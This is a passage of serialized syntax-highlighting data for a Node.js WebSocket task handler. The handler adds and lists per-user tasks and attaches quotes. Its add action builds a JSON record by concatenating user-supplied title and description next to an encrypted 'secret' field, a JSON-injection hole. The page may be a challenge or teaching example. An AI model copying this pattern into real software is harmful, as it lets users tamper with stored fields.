'get', tasks: tasks }));\n            } catch (e) {\n            
    ws.send(JSON.stringify({ success: false, action: 'get' }));\n            }\n        }\n        else {\n            ws.send(JSON.stringify({ success: false, error: 'Invalid action' }));\n        }\n    });\n};\n\nmodule.exports = (database, session) => {\n    db = database;\n    sessionParser = session;\n    return wsHandler;\n};\n",[48760],{"type":33,"tag":105,"props":48761,"children":48762},{"__ignoreMap":8},[48763,48820,48827,48842,48858,48865,48885,48905,48925,48941,48949,48956,49001,49017,49054,49093,49129,49145,49165,49172,49179,49186,49248,49287,49346,49353,49401,49413,49529,49606,49634,49709,49716,49723,49775,49786,49831,49852,49888,49895,49912,49919,49951,50015,50031,50106,50114,50121,50133,50182,50203,50257,50309,50354,50362,50389,50464,50472,50480,50572,50600,50676,50684,50692,50704,50781,50789,50797,50805,50813,50862,50884,50904,50920],{"type":33,"tag":128,"props":48764,"children":48765},{"class":130,"line":131},[48766,48770,48774,48779,48783,48787,48791,48795,48799,48803,48807,48812,48816],{"type":33,"tag":128,"props":48767,"children":48768},{"style":300},[48769],{"type":38,"value":15973},{"type":33,"tag":128,"props":48771,"children":48772},{"style":312},[48773],{"type":38,"value":5642},{"type":33,"tag":128,"props":48775,"children":48776},{"style":306},[48777],{"type":38,"value":48778}," 
encrypt",{"type":33,"tag":128,"props":48780,"children":48781},{"style":312},[48782],{"type":38,"value":5584},{"type":33,"tag":128,"props":48784,"children":48785},{"style":306},[48786],{"type":38,"value":47051},{"type":33,"tag":128,"props":48788,"children":48789},{"style":312},[48790],{"type":38,"value":5652},{"type":33,"tag":128,"props":48792,"children":48793},{"style":312},[48794],{"type":38,"value":5657},{"type":33,"tag":128,"props":48796,"children":48797},{"style":135},[48798],{"type":38,"value":47386},{"type":33,"tag":128,"props":48800,"children":48801},{"style":312},[48802],{"type":38,"value":5566},{"type":33,"tag":128,"props":48804,"children":48805},{"style":676},[48806],{"type":38,"value":6040},{"type":33,"tag":128,"props":48808,"children":48809},{"style":140},[48810],{"type":38,"value":48811},"./util/crypto",{"type":33,"tag":128,"props":48813,"children":48814},{"style":676},[48815],{"type":38,"value":6040},{"type":33,"tag":128,"props":48817,"children":48818},{"style":312},[48819],{"type":38,"value":5815},{"type":33,"tag":128,"props":48821,"children":48822},{"class":130,"line":362},[48823],{"type":33,"tag":128,"props":48824,"children":48825},{"emptyLinePlaceholder":896},[48826],{"type":38,"value":899},{"type":33,"tag":128,"props":48828,"children":48829},{"class":130,"line":403},[48830,48834,48838],{"type":33,"tag":128,"props":48831,"children":48832},{"style":300},[48833],{"type":38,"value":7548},{"type":33,"tag":128,"props":48835,"children":48836},{"style":306},[48837],{"type":38,"value":46507},{"type":33,"tag":128,"props":48839,"children":48840},{"style":312},[48841],{"type":38,"value":5676},{"type":33,"tag":128,"props":48843,"children":48844},{"class":130,"line":739},[48845,48849,48854],{"type":33,"tag":128,"props":48846,"children":48847},{"style":300},[48848],{"type":38,"value":7548},{"type":33,"tag":128,"props":48850,"children":48851},{"style":306},[48852],{"type":38,"value":48853}," 
sessionParser",{"type":33,"tag":128,"props":48855,"children":48856},{"style":312},[48857],{"type":38,"value":5676},{"type":33,"tag":128,"props":48859,"children":48860},{"class":130,"line":765},[48861],{"type":33,"tag":128,"props":48862,"children":48863},{"emptyLinePlaceholder":896},[48864],{"type":38,"value":899},{"type":33,"tag":128,"props":48866,"children":48867},{"class":130,"line":804},[48868,48872,48877,48881],{"type":33,"tag":128,"props":48869,"children":48870},{"style":300},[48871],{"type":38,"value":15973},{"type":33,"tag":128,"props":48873,"children":48874},{"style":306},[48875],{"type":38,"value":48876}," quotes",{"type":33,"tag":128,"props":48878,"children":48879},{"style":312},[48880],{"type":38,"value":5657},{"type":33,"tag":128,"props":48882,"children":48883},{"style":312},[48884],{"type":38,"value":1466},{"type":33,"tag":128,"props":48886,"children":48887},{"class":130,"line":839},[48888,48892,48897,48901],{"type":33,"tag":128,"props":48889,"children":48890},{"style":676},[48891],{"type":38,"value":771},{"type":33,"tag":128,"props":48893,"children":48894},{"style":140},[48895],{"type":38,"value":48896},"Genius is one percent inspiration and ninety-nine percent perspiration.",{"type":33,"tag":128,"props":48898,"children":48899},{"style":676},[48900],{"type":38,"value":669},{"type":33,"tag":128,"props":48902,"children":48903},{"style":312},[48904],{"type":38,"value":693},{"type":33,"tag":128,"props":48906,"children":48907},{"class":130,"line":848},[48908,48912,48917,48921],{"type":33,"tag":128,"props":48909,"children":48910},{"style":676},[48911],{"type":38,"value":771},{"type":33,"tag":128,"props":48913,"children":48914},{"style":140},[48915],{"type":38,"value":48916},"Fate is in your hands and no one 
elses.",{"type":33,"tag":128,"props":48918,"children":48919},{"style":676},[48920],{"type":38,"value":669},{"type":33,"tag":128,"props":48922,"children":48923},{"style":312},[48924],{"type":38,"value":693},{"type":33,"tag":128,"props":48926,"children":48927},{"class":130,"line":976},[48928,48932,48937],{"type":33,"tag":128,"props":48929,"children":48930},{"style":676},[48931],{"type":38,"value":771},{"type":33,"tag":128,"props":48933,"children":48934},{"style":140},[48935],{"type":38,"value":48936},"Trust yourself. You know more than you think you do.",{"type":33,"tag":128,"props":48938,"children":48939},{"style":676},[48940],{"type":38,"value":836},{"type":33,"tag":128,"props":48942,"children":48943},{"class":130,"line":988},[48944],{"type":33,"tag":128,"props":48945,"children":48946},{"style":312},[48947],{"type":38,"value":48948},"];\n",{"type":33,"tag":128,"props":48950,"children":48951},{"class":130,"line":1001},[48952],{"type":33,"tag":128,"props":48953,"children":48954},{"emptyLinePlaceholder":896},[48955],{"type":38,"value":899},{"type":33,"tag":128,"props":48957,"children":48958},{"class":130,"line":1014},[48959,48963,48968,48972,48976,48981,48985,48989,48993,48997],{"type":33,"tag":128,"props":48960,"children":48961},{"style":300},[48962],{"type":38,"value":15973},{"type":33,"tag":128,"props":48964,"children":48965},{"style":135},[48966],{"type":38,"value":48967}," 
wsHandler",{"type":33,"tag":128,"props":48969,"children":48970},{"style":312},[48971],{"type":38,"value":5657},{"type":33,"tag":128,"props":48973,"children":48974},{"style":312},[48975],{"type":38,"value":2852},{"type":33,"tag":128,"props":48977,"children":48978},{"style":306},[48979],{"type":38,"value":48980},"ws",{"type":33,"tag":128,"props":48982,"children":48983},{"style":312},[48984],{"type":38,"value":5584},{"type":33,"tag":128,"props":48986,"children":48987},{"style":306},[48988],{"type":38,"value":5662},{"type":33,"tag":128,"props":48990,"children":48991},{"style":312},[48992],{"type":38,"value":2966},{"type":33,"tag":128,"props":48994,"children":48995},{"style":312},[48996],{"type":38,"value":5625},{"type":33,"tag":128,"props":48998,"children":48999},{"style":312},[49000],{"type":38,"value":762},{"type":33,"tag":128,"props":49002,"children":49003},{"class":130,"line":1026},[49004,49009,49013],{"type":33,"tag":128,"props":49005,"children":49006},{"style":300},[49007],{"type":38,"value":49008},"    let",{"type":33,"tag":128,"props":49010,"children":49011},{"style":306},[49012],{"type":38,"value":6540},{"type":33,"tag":128,"props":49014,"children":49015},{"style":312},[49016],{"type":38,"value":5676},{"type":33,"tag":128,"props":49018,"children":49019},{"class":130,"line":1038},[49020,49025,49029,49033,49037,49042,49046,49050],{"type":33,"tag":128,"props":49021,"children":49022},{"style":135},[49023],{"type":38,"value":49024},"    sessionParser",{"type":33,"tag":128,"props":49026,"children":49027},{"style":312},[49028],{"type":38,"value":5566},{"type":33,"tag":128,"props":49030,"children":49031},{"style":306},[49032],{"type":38,"value":5607},{"type":33,"tag":128,"props":49034,"children":49035},{"style":312},[49036],{"type":38,"value":5584},{"type":33,"tag":128,"props":49038,"children":49039},{"style":312},[49040],{"type":38,"value":49041}," 
{},",{"type":33,"tag":128,"props":49043,"children":49044},{"style":312},[49045],{"type":38,"value":13259},{"type":33,"tag":128,"props":49047,"children":49048},{"style":312},[49049],{"type":38,"value":5625},{"type":33,"tag":128,"props":49051,"children":49052},{"style":312},[49053],{"type":38,"value":762},{"type":33,"tag":128,"props":49055,"children":49056},{"class":130,"line":1051},[49057,49061,49065,49069,49073,49077,49081,49085,49089],{"type":33,"tag":128,"props":49058,"children":49059},{"style":1576},[49060],{"type":38,"value":15223},{"type":33,"tag":128,"props":49062,"children":49063},{"style":312},[49064],{"type":38,"value":2852},{"type":33,"tag":128,"props":49066,"children":49067},{"style":306},[49068],{"type":38,"value":5607},{"type":33,"tag":128,"props":49070,"children":49071},{"style":312},[49072],{"type":38,"value":215},{"type":33,"tag":128,"props":49074,"children":49075},{"style":306},[49076],{"type":38,"value":6557},{"type":33,"tag":128,"props":49078,"children":49079},{"style":312},[49080],{"type":38,"value":215},{"type":33,"tag":128,"props":49082,"children":49083},{"style":306},[49084],{"type":38,"value":6566},{"type":33,"tag":128,"props":49086,"children":49087},{"style":312},[49088],{"type":38,"value":2966},{"type":33,"tag":128,"props":49090,"children":49091},{"style":312},[49092],{"type":38,"value":762},{"type":33,"tag":128,"props":49094,"children":49095},{"class":130,"line":1063},[49096,49101,49105,49109,49113,49117,49121,49125],{"type":33,"tag":128,"props":49097,"children":49098},{"style":306},[49099],{"type":38,"value":49100},"            
userId",{"type":33,"tag":128,"props":49102,"children":49103},{"style":312},[49104],{"type":38,"value":5657},{"type":33,"tag":128,"props":49106,"children":49107},{"style":306},[49108],{"type":38,"value":5662},{"type":33,"tag":128,"props":49110,"children":49111},{"style":312},[49112],{"type":38,"value":215},{"type":33,"tag":128,"props":49114,"children":49115},{"style":306},[49116],{"type":38,"value":6557},{"type":33,"tag":128,"props":49118,"children":49119},{"style":312},[49120],{"type":38,"value":215},{"type":33,"tag":128,"props":49122,"children":49123},{"style":306},[49124],{"type":38,"value":6566},{"type":33,"tag":128,"props":49126,"children":49127},{"style":312},[49128],{"type":38,"value":5676},{"type":33,"tag":128,"props":49130,"children":49131},{"class":130,"line":1076},[49132,49137,49141],{"type":33,"tag":128,"props":49133,"children":49134},{"style":312},[49135],{"type":38,"value":49136},"        }",{"type":33,"tag":128,"props":49138,"children":49139},{"style":1576},[49140],{"type":38,"value":14269},{"type":33,"tag":128,"props":49142,"children":49143},{"style":312},[49144],{"type":38,"value":762},{"type":33,"tag":128,"props":49146,"children":49147},{"class":130,"line":1089},[49148,49153,49157,49161],{"type":33,"tag":128,"props":49149,"children":49150},{"style":306},[49151],{"type":38,"value":49152},"            
ws",{"type":33,"tag":128,"props":49154,"children":49155},{"style":312},[49156],{"type":38,"value":215},{"type":33,"tag":128,"props":49158,"children":49159},{"style":135},[49160],{"type":38,"value":23692},{"type":33,"tag":128,"props":49162,"children":49163},{"style":312},[49164],{"type":38,"value":15496},{"type":33,"tag":128,"props":49166,"children":49167},{"class":130,"line":1101},[49168],{"type":33,"tag":128,"props":49169,"children":49170},{"style":312},[49171],{"type":38,"value":15318},{"type":33,"tag":128,"props":49173,"children":49174},{"class":130,"line":1114},[49175],{"type":33,"tag":128,"props":49176,"children":49177},{"style":312},[49178],{"type":38,"value":13745},{"type":33,"tag":128,"props":49180,"children":49181},{"class":130,"line":1127},[49182],{"type":33,"tag":128,"props":49183,"children":49184},{"emptyLinePlaceholder":896},[49185],{"type":38,"value":899},{"type":33,"tag":128,"props":49187,"children":49188},{"class":130,"line":1139},[49189,49194,49198,49203,49207,49211,49215,49219,49223,49227,49231,49236,49240,49244],{"type":33,"tag":128,"props":49190,"children":49191},{"style":306},[49192],{"type":38,"value":49193},"    
ws",{"type":33,"tag":128,"props":49195,"children":49196},{"style":312},[49197],{"type":38,"value":215},{"type":33,"tag":128,"props":49199,"children":49200},{"style":135},[49201],{"type":38,"value":49202},"on",{"type":33,"tag":128,"props":49204,"children":49205},{"style":312},[49206],{"type":38,"value":5566},{"type":33,"tag":128,"props":49208,"children":49209},{"style":676},[49210],{"type":38,"value":6040},{"type":33,"tag":128,"props":49212,"children":49213},{"style":140},[49214],{"type":38,"value":6948},{"type":33,"tag":128,"props":49216,"children":49217},{"style":676},[49218],{"type":38,"value":6040},{"type":33,"tag":128,"props":49220,"children":49221},{"style":312},[49222],{"type":38,"value":5584},{"type":33,"tag":128,"props":49224,"children":49225},{"style":300},[49226],{"type":38,"value":5598},{"type":33,"tag":128,"props":49228,"children":49229},{"style":312},[49230],{"type":38,"value":2852},{"type":33,"tag":128,"props":49232,"children":49233},{"style":306},[49234],{"type":38,"value":49235},"msg",{"type":33,"tag":128,"props":49237,"children":49238},{"style":312},[49239],{"type":38,"value":2966},{"type":33,"tag":128,"props":49241,"children":49242},{"style":312},[49243],{"type":38,"value":5625},{"type":33,"tag":128,"props":49245,"children":49246},{"style":312},[49247],{"type":38,"value":762},{"type":33,"tag":128,"props":49249,"children":49250},{"class":130,"line":1152},[49251,49255,49259,49263,49267,49271,49275,49279,49283],{"type":33,"tag":128,"props":49252,"children":49253},{"style":300},[49254],{"type":38,"value":15121},{"type":33,"tag":128,"props":49256,"children":49257},{"style":306},[49258],{"type":38,"value":13545},{"type":33,"tag":128,"props":49260,"children":49261},{"style":312},[49262],{"type":38,"value":5657},{"type":33,"tag":128,"props":49264,"children":49265},{"style":306},[49266],{"type":38,"value":4321},{"type":33,"tag":128,"props":49268,"children":49269},{"style":312},[49270],{"type":38,"value":215},{"type":33,"tag":128,"props":49272,"children":492
73},{"style":135},[49274],{"type":38,"value":25933},{"type":33,"tag":128,"props":49276,"children":49277},{"style":312},[49278],{"type":38,"value":5566},{"type":33,"tag":128,"props":49280,"children":49281},{"style":306},[49282],{"type":38,"value":49235},{"type":33,"tag":128,"props":49284,"children":49285},{"style":312},[49286],{"type":38,"value":5815},{"type":33,"tag":128,"props":49288,"children":49289},{"class":130,"line":1165},[49290,49294,49298,49302,49306,49310,49314,49318,49322,49326,49330,49334,49338,49342],{"type":33,"tag":128,"props":49291,"children":49292},{"style":300},[49293],{"type":38,"value":15121},{"type":33,"tag":128,"props":49295,"children":49296},{"style":306},[49297],{"type":38,"value":5066},{"type":33,"tag":128,"props":49299,"children":49300},{"style":312},[49301],{"type":38,"value":5657},{"type":33,"tag":128,"props":49303,"children":49304},{"style":1576},[49305],{"type":38,"value":5796},{"type":33,"tag":128,"props":49307,"children":49308},{"style":306},[49309],{"type":38,"value":46507},{"type":33,"tag":128,"props":49311,"children":49312},{"style":312},[49313],{"type":38,"value":215},{"type":33,"tag":128,"props":49315,"children":49316},{"style":135},[49317],{"type":38,"value":46516},{"type":33,"tag":128,"props":49319,"children":49320},{"style":312},[49321],{"type":38,"value":5566},{"type":33,"tag":128,"props":49323,"children":49324},{"style":306},[49325],{"type":38,"value":5607},{"type":33,"tag":128,"props":49327,"children":49328},{"style":312},[49329],{"type":38,"value":215},{"type":33,"tag":128,"props":49331,"children":49332},{"style":306},[49333],{"type":38,"value":6557},{"type":33,"tag":128,"props":49335,"children":49336},{"style":312},[49337],{"type":38,"value":215},{"type":33,"tag":128,"props":49339,"children":49340},{"style":306},[49341],{"type":38,"value":6566},{"type":33,"tag":128,"props":49343,"children":49344},{"style":312},[49345],{"type":38,"value":5815},{"type":33,"tag":128,"props":49347,"children":49348},{"class":130,"line":1177},[4
9349],{"type":33,"tag":128,"props":49350,"children":49351},{"emptyLinePlaceholder":896},[49352],{"type":38,"value":899},{"type":33,"tag":128,"props":49354,"children":49355},{"class":130,"line":1189},[49356,49360,49364,49368,49372,49376,49380,49384,49389,49393,49397],{"type":33,"tag":128,"props":49357,"children":49358},{"style":1576},[49359],{"type":38,"value":15223},{"type":33,"tag":128,"props":49361,"children":49362},{"style":312},[49363],{"type":38,"value":2852},{"type":33,"tag":128,"props":49365,"children":49366},{"style":306},[49367],{"type":38,"value":2815},{"type":33,"tag":128,"props":49369,"children":49370},{"style":312},[49371],{"type":38,"value":215},{"type":33,"tag":128,"props":49373,"children":49374},{"style":306},[49375],{"type":38,"value":12513},{"type":33,"tag":128,"props":49377,"children":49378},{"style":300},[49379],{"type":38,"value":13595},{"type":33,"tag":128,"props":49381,"children":49382},{"style":676},[49383],{"type":38,"value":6739},{"type":33,"tag":128,"props":49385,"children":49386},{"style":140},[49387],{"type":38,"value":49388},"add",{"type":33,"tag":128,"props":49390,"children":49391},{"style":676},[49392],{"type":38,"value":6040},{"type":33,"tag":128,"props":49394,"children":49395},{"style":312},[49396],{"type":38,"value":2966},{"type":33,"tag":128,"props":49398,"children":49399},{"style":312},[49400],{"type":38,"value":762},{"type":33,"tag":128,"props":49402,"children":49403},{"class":130,"line":1202},[49404,49409],{"type":33,"tag":128,"props":49405,"children":49406},{"style":1576},[49407],{"type":38,"value":49408},"            
try",{"type":33,"tag":128,"props":49410,"children":49411},{"style":312},[49412],{"type":38,"value":762},{"type":33,"tag":128,"props":49414,"children":49415},{"class":130,"line":1214},[49416,49420,49424,49428,49433,49437,49441,49445,49449,49454,49458,49462,49466,49470,49474,49479,49483,49487,49491,49495,49499,49504,49508,49512,49516,49521,49525],{"type":33,"tag":128,"props":49417,"children":49418},{"style":1576},[49419],{"type":38,"value":19763},{"type":33,"tag":128,"props":49421,"children":49422},{"style":306},[49423],{"type":38,"value":46507},{"type":33,"tag":128,"props":49425,"children":49426},{"style":312},[49427],{"type":38,"value":215},{"type":33,"tag":128,"props":49429,"children":49430},{"style":135},[49431],{"type":38,"value":49432},"addTask",{"type":33,"tag":128,"props":49434,"children":49435},{"style":312},[49436],{"type":38,"value":5566},{"type":33,"tag":128,"props":49438,"children":49439},{"style":306},[49440],{"type":38,"value":6566},{"type":33,"tag":128,"props":49442,"children":49443},{"style":312},[49444],{"type":38,"value":5584},{"type":33,"tag":128,"props":49446,"children":49447},{"style":676},[49448],{"type":38,"value":5710},{"type":33,"tag":128,"props":49450,"children":49451},{"style":140},[49452],{"type":38,"value":49453},"{\"title\":\"",{"type":33,"tag":128,"props":49455,"children":49456},{"style":1576},[49457],{"type":38,"value":5720},{"type":33,"tag":128,"props":49459,"children":49460},{"style":140},[49461],{"type":38,"value":2815},{"type":33,"tag":128,"props":49463,"children":49464},{"style":312},[49465],{"type":38,"value":215},{"type":33,"tag":128,"props":49467,"children":49468},{"style":140},[49469],{"type":38,"value":776},{"type":33,"tag":128,"props":49471,"children":49472},{"style":1576},[49473],{"type":38,"value":5730},{"type":33,"tag":128,"props":49475,"children":49476},{"style":140},[49477],{"type":38,"value":49478},"\",\"description\":\"",{"type":33,"tag":128,"props":49480,"children":49481},{"style":1576},[49482],{"type":38,"value":572
0},{"type":33,"tag":128,"props":49484,"children":49485},{"style":140},[49486],{"type":38,"value":2815},{"type":33,"tag":128,"props":49488,"children":49489},{"style":312},[49490],{"type":38,"value":215},{"type":33,"tag":128,"props":49492,"children":49493},{"style":140},[49494],{"type":38,"value":12236},{"type":33,"tag":128,"props":49496,"children":49497},{"style":1576},[49498],{"type":38,"value":5730},{"type":33,"tag":128,"props":49500,"children":49501},{"style":140},[49502],{"type":38,"value":49503},"\",\"secret\":\"",{"type":33,"tag":128,"props":49505,"children":49506},{"style":1576},[49507],{"type":38,"value":5720},{"type":33,"tag":128,"props":49509,"children":49510},{"style":140},[49511],{"type":38,"value":46812},{"type":33,"tag":128,"props":49513,"children":49514},{"style":1576},[49515],{"type":38,"value":5730},{"type":33,"tag":128,"props":49517,"children":49518},{"style":140},[49519],{"type":38,"value":49520},"\"}",{"type":33,"tag":128,"props":49522,"children":49523},{"style":676},[49524],{"type":38,"value":5739},{"type":33,"tag":128,"props":49526,"children":49527},{"style":312},[49528],{"type":38,"value":5815},{"type":33,"tag":128,"props":49530,"children":49531},{"class":130,"line":1226},[49532,49537,49541,49545,49549,49553,49557,49562,49566,49570,49574,49578,49582,49586,49590,49594,49598,49602],{"type":33,"tag":128,"props":49533,"children":49534},{"style":306},[49535],{"type":38,"value":49536},"                
ws",{"type":33,"tag":128,"props":49538,"children":49539},{"style":312},[49540],{"type":38,"value":215},{"type":33,"tag":128,"props":49542,"children":49543},{"style":135},[49544],{"type":38,"value":23433},{"type":33,"tag":128,"props":49546,"children":49547},{"style":312},[49548],{"type":38,"value":5566},{"type":33,"tag":128,"props":49550,"children":49551},{"style":306},[49552],{"type":38,"value":6301},{"type":33,"tag":128,"props":49554,"children":49555},{"style":312},[49556],{"type":38,"value":215},{"type":33,"tag":128,"props":49558,"children":49559},{"style":135},[49560],{"type":38,"value":49561},"stringify",{"type":33,"tag":128,"props":49563,"children":49564},{"style":312},[49565],{"type":38,"value":5836},{"type":33,"tag":128,"props":49567,"children":49568},{"style":437},[49569],{"type":38,"value":5841},{"type":33,"tag":128,"props":49571,"children":49572},{"style":312},[49573],{"type":38,"value":284},{"type":33,"tag":128,"props":49575,"children":49576},{"style":1576},[49577],{"type":38,"value":5850},{"type":33,"tag":128,"props":49579,"children":49580},{"style":312},[49581],{"type":38,"value":5584},{"type":33,"tag":128,"props":49583,"children":49584},{"style":437},[49585],{"type":38,"value":14849},{"type":33,"tag":128,"props":49587,"children":49588},{"style":312},[49589],{"type":38,"value":284},{"type":33,"tag":128,"props":49591,"children":49592},{"style":676},[49593],{"type":38,"value":6739},{"type":33,"tag":128,"props":49595,"children":49596},{"style":140},[49597],{"type":38,"value":49388},{"type":33,"tag":128,"props":49599,"children":49600},{"style":676},[49601],{"type":38,"value":6040},{"type":33,"tag":128,"props":49603,"children":49604},{"style":312},[49605],{"type":38,"value":14256},{"type":33,"tag":128,"props":49607,"children":49608},{"class":130,"line":1239},[49609,49614,49618,49622,49626,49630],{"type":33,"tag":128,"props":49610,"children":49611},{"style":312},[49612],{"type":38,"value":49613},"            
}",{"type":33,"tag":128,"props":49615,"children":49616},{"style":1576},[49617],{"type":38,"value":6855},{"type":33,"tag":128,"props":49619,"children":49620},{"style":312},[49621],{"type":38,"value":2852},{"type":33,"tag":128,"props":49623,"children":49624},{"style":306},[49625],{"type":38,"value":23474},{"type":33,"tag":128,"props":49627,"children":49628},{"style":312},[49629],{"type":38,"value":2966},{"type":33,"tag":128,"props":49631,"children":49632},{"style":312},[49633],{"type":38,"value":762},{"type":33,"tag":128,"props":49635,"children":49636},{"class":130,"line":1251},[49637,49641,49645,49649,49653,49657,49661,49665,49669,49673,49677,49681,49685,49689,49693,49697,49701,49705],{"type":33,"tag":128,"props":49638,"children":49639},{"style":306},[49640],{"type":38,"value":49536},{"type":33,"tag":128,"props":49642,"children":49643},{"style":312},[49644],{"type":38,"value":215},{"type":33,"tag":128,"props":49646,"children":49647},{"style":135},[49648],{"type":38,"value":23433},{"type":33,"tag":128,"props":49650,"children":49651},{"style":312},[49652],{"type":38,"value":5566},{"type":33,"tag":128,"props":49654,"children":49655},{"style":306},[49656],{"type":38,"value":6301},{"type":33,"tag":128,"props":49658,"children":49659},{"style":312},[49660],{"type":38,"value":215},{"type":33,"tag":128,"props":49662,"children":49663},{"style":135},[49664],{"type":38,"value":49561},{"type":33,"tag":128,"props":49666,"children":49667},{"style":312},[49668],{"type":38,"value":5836},{"type":33,"tag":128,"props":49670,"children":49671},{"style":437},[49672],{"type":38,"value":5841},{"type":33,"tag":128,"props":49674,"children":49675},{"style":312},[49676],{"type":38,"value":284},{"type":33,"tag":128,"props":49678,"children":49679},{"style":1576},[49680],{"type":38,"value":6721},{"type":33,"tag":128,"props":49682,"children":49683},{"style":312},[49684],{"type":38,"value":5584},{"type":33,"tag":128,"props":49686,"children":49687},{"style":437},[49688],{"type":38,"value":14849},{"typ
e":33,"tag":128,"props":49690,"children":49691},{"style":312},[49692],{"type":38,"value":284},{"type":33,"tag":128,"props":49694,"children":49695},{"style":676},[49696],{"type":38,"value":6739},{"type":33,"tag":128,"props":49698,"children":49699},{"style":140},[49700],{"type":38,"value":49388},{"type":33,"tag":128,"props":49702,"children":49703},{"style":676},[49704],{"type":38,"value":6040},{"type":33,"tag":128,"props":49706,"children":49707},{"style":312},[49708],{"type":38,"value":14256},{"type":33,"tag":128,"props":49710,"children":49711},{"class":130,"line":1263},[49712],{"type":33,"tag":128,"props":49713,"children":49714},{"style":312},[49715],{"type":38,"value":35996},{"type":33,"tag":128,"props":49717,"children":49718},{"class":130,"line":1276},[49719],{"type":33,"tag":128,"props":49720,"children":49721},{"style":312},[49722],{"type":38,"value":15318},{"type":33,"tag":128,"props":49724,"children":49725},{"class":130,"line":1288},[49726,49731,49735,49739,49743,49747,49751,49755,49759,49763,49767,49771],{"type":33,"tag":128,"props":49727,"children":49728},{"style":1576},[49729],{"type":38,"value":49730},"        
else",{"type":33,"tag":128,"props":49732,"children":49733},{"style":1576},[49734],{"type":38,"value":14274},{"type":33,"tag":128,"props":49736,"children":49737},{"style":312},[49738],{"type":38,"value":2852},{"type":33,"tag":128,"props":49740,"children":49741},{"style":306},[49742],{"type":38,"value":2815},{"type":33,"tag":128,"props":49744,"children":49745},{"style":312},[49746],{"type":38,"value":215},{"type":33,"tag":128,"props":49748,"children":49749},{"style":306},[49750],{"type":38,"value":12513},{"type":33,"tag":128,"props":49752,"children":49753},{"style":300},[49754],{"type":38,"value":13595},{"type":33,"tag":128,"props":49756,"children":49757},{"style":676},[49758],{"type":38,"value":6739},{"type":33,"tag":128,"props":49760,"children":49761},{"style":140},[49762],{"type":38,"value":13526},{"type":33,"tag":128,"props":49764,"children":49765},{"style":676},[49766],{"type":38,"value":6040},{"type":33,"tag":128,"props":49768,"children":49769},{"style":312},[49770],{"type":38,"value":2966},{"type":33,"tag":128,"props":49772,"children":49773},{"style":312},[49774],{"type":38,"value":762},{"type":33,"tag":128,"props":49776,"children":49777},{"class":130,"line":1300},[49778,49782],{"type":33,"tag":128,"props":49779,"children":49780},{"style":1576},[49781],{"type":38,"value":49408},{"type":33,"tag":128,"props":49783,"children":49784},{"style":312},[49785],{"type":38,"value":762},{"type":33,"tag":128,"props":49787,"children":49788},{"class":130,"line":1313},[49789,49794,49798,49802,49806,49810,49814,49819,49823,49827],{"type":33,"tag":128,"props":49790,"children":49791},{"style":300},[49792],{"type":38,"value":49793},"                
const",{"type":33,"tag":128,"props":49795,"children":49796},{"style":306},[49797],{"type":38,"value":5787},{"type":33,"tag":128,"props":49799,"children":49800},{"style":312},[49801],{"type":38,"value":5657},{"type":33,"tag":128,"props":49803,"children":49804},{"style":1576},[49805],{"type":38,"value":5796},{"type":33,"tag":128,"props":49807,"children":49808},{"style":306},[49809],{"type":38,"value":46507},{"type":33,"tag":128,"props":49811,"children":49812},{"style":312},[49813],{"type":38,"value":215},{"type":33,"tag":128,"props":49815,"children":49816},{"style":135},[49817],{"type":38,"value":49818},"getTasks",{"type":33,"tag":128,"props":49820,"children":49821},{"style":312},[49822],{"type":38,"value":5566},{"type":33,"tag":128,"props":49824,"children":49825},{"style":306},[49826],{"type":38,"value":6566},{"type":33,"tag":128,"props":49828,"children":49829},{"style":312},[49830],{"type":38,"value":5815},{"type":33,"tag":128,"props":49832,"children":49833},{"class":130,"line":1327},[49834,49838,49843,49847],{"type":33,"tag":128,"props":49835,"children":49836},{"style":300},[49837],{"type":38,"value":49793},{"type":33,"tag":128,"props":49839,"children":49840},{"style":306},[49841],{"type":38,"value":49842}," tasks",{"type":33,"tag":128,"props":49844,"children":49845},{"style":312},[49846],{"type":38,"value":5657},{"type":33,"tag":128,"props":49848,"children":49849},{"style":312},[49850],{"type":38,"value":49851}," [];\n",{"type":33,"tag":128,"props":49853,"children":49854},{"class":130,"line":11196},[49855,49860,49864,49868,49872,49876,49880,49884],{"type":33,"tag":128,"props":49856,"children":49857},{"style":1576},[49858],{"type":38,"value":49859},"                
for",{"type":33,"tag":128,"props":49861,"children":49862},{"style":312},[49863],{"type":38,"value":2852},{"type":33,"tag":128,"props":49865,"children":49866},{"style":300},[49867],{"type":38,"value":15973},{"type":33,"tag":128,"props":49869,"children":49870},{"style":306},[49871],{"type":38,"value":35848},{"type":33,"tag":128,"props":49873,"children":49874},{"style":300},[49875],{"type":38,"value":15983},{"type":33,"tag":128,"props":49877,"children":49878},{"style":306},[49879],{"type":38,"value":5787},{"type":33,"tag":128,"props":49881,"children":49882},{"style":312},[49883],{"type":38,"value":2966},{"type":33,"tag":128,"props":49885,"children":49886},{"style":312},[49887],{"type":38,"value":762},{"type":33,"tag":128,"props":49889,"children":49890},{"class":130,"line":11204},[49891],{"type":33,"tag":128,"props":49892,"children":49893},{"emptyLinePlaceholder":896},[49894],{"type":38,"value":899},{"type":33,"tag":128,"props":49896,"children":49897},{"class":130,"line":11213},[49898,49903,49908],{"type":33,"tag":128,"props":49899,"children":49900},{"style":300},[49901],{"type":38,"value":49902},"                    let",{"type":33,"tag":128,"props":49904,"children":49905},{"style":306},[49906],{"type":38,"value":49907}," quote",{"type":33,"tag":128,"props":49909,"children":49910},{"style":312},[49911],{"type":38,"value":5676},{"type":33,"tag":128,"props":49913,"children":49914},{"class":130,"line":11250},[49915],{"type":33,"tag":128,"props":49916,"children":49917},{"emptyLinePlaceholder":896},[49918],{"type":38,"value":899},{"type":33,"tag":128,"props":49920,"children":49921},{"class":130,"line":11270},[49922,49927,49931,49935,49939,49943,49947],{"type":33,"tag":128,"props":49923,"children":49924},{"style":1576},[49925],{"type":38,"value":49926},"                    
